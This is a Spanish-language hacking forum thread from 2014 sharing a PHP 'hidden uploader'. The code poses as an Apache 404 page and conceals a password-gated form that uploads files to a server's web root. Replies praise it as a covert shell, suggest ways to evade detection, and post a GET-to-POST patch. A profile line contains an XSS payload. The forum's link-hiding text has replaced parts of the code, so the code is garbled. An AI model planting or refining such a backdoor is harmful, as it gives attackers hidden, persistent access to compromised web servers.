comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Uploader oculto

  • 5 Respuestas
  • 2282 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Decode

  • *
  • Underc0der
  • Mensajes: 38
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Agosto 26, 2014, 09:39:18 pm »
Hola gente,aquí les dejo un uploader oculto:

Código: PHP
  1. <title>404 Not Found</title>
  2. <h1>Not Found</h1>
  3. <p>The requested URL was not found on this server.</p>
  4. <hr>
  5. <address>Apache Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port 80</address>
  6.     <style>
  7.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  8.     </style>
  9.     <center>
  10.     <form method="post"><p>
  11. <center><input type="password" name="pw" size="25" value=""></center>
  12. </form></p></center>
  13. <?php
  14. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST["pw"])==0){if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST["pw"])=="76ee3de97a1b8b903319b7c013d8c877"){if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_FILES["A"])==0){
  15. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_FILES['A']['tmp_name'],$_SERVER["DOCUMENT_ROOT"].'/'.$_FILES['A']['name'])==1){echo "<center>Archivo subido!</center>";}
  16. }else{echo '<form enctype="multipart/form-data" action="'.$_SERVER["REQUEST_URI"].'" method="POST"><center><input name="A" type="file"><input type="submit" value="Subir"></center></form>';}No tienes permisos para ver links. Registrate o Entra con tu cuenta();}}
  17. ?>

Password: upload

Saludos.
« Última modificación: Julio 17, 2018, 05:31:44 pm por Decode »

Desconectado 0b3Y

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
  • The World Is MINE!
    • Ver Perfil
« Respuesta #1 en: Agosto 27, 2014, 02:47:37 pm »
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« Respuesta #2 en: Agosto 27, 2014, 03:38:13 pm »
yo tambien uso lo mismo para mis tools en php.

Desconectado fermino

  • *
  • Underc0der
  • Mensajes: 330
  • Actividad:
    0%
  • Reputación 1
  • Aprendiz de todo, maestro de nada...
    • Ver Perfil
    • In The Middle Of Knowledge
« Respuesta #3 en: Agosto 28, 2014, 04:59:09 pm »
Buenísimo! Lo uníco que agregaría es un header() con el 404 para que cualquiera que ande con una extensión que le permita ver las headers no sospeche...
Visita mi blog: No tienes permisos para ver links. Registrate o Entra con tu cuenta.

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: &quot;&gt;&lt;&lt;img src=y onerror=prompt();&gt;
« Respuesta #4 en: Agosto 30, 2014, 03:22:52 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.


Si envías la pass por el método POST no aparecerá en la URL.
Contacto: @migueljimeno96 -

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« Respuesta #5 en: Agosto 30, 2014, 03:56:43 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Genial!, me encanta este tipo de shells, totalmente ocultas :D. Unicamente... podrias hacer que no apareciera la password en la url??

Lamentablemente la contraseña saldrá en la URL siempre.

Saludos.


Si envías la pass por el método POST no aparecerá en la URL.

Para los que no saben, habría que editar las siguientes lineas por estas:

Código: PHP
  1.  <form><p>
  2. <center><input type="password" name="pw" size="25" value=""></center>
  3. </form></p></center>
  4. <?php
  5. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET["pw"])==0){if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET["pw"])=="202cb962ac59075b964b07152d234b70")

Por:

Código: PHP
  1.  <form method="post"><p>
  2. <center><input type="password" name="pw" size="25" value=""></center>
  3. </form></p></center>
  4. <?php
  5. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST["pw"])==0){if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_POST["pw"])=="202cb962ac59075b964b07152d234b70")

Un saludo.



 

¿Te gustó el post? COMPARTILO!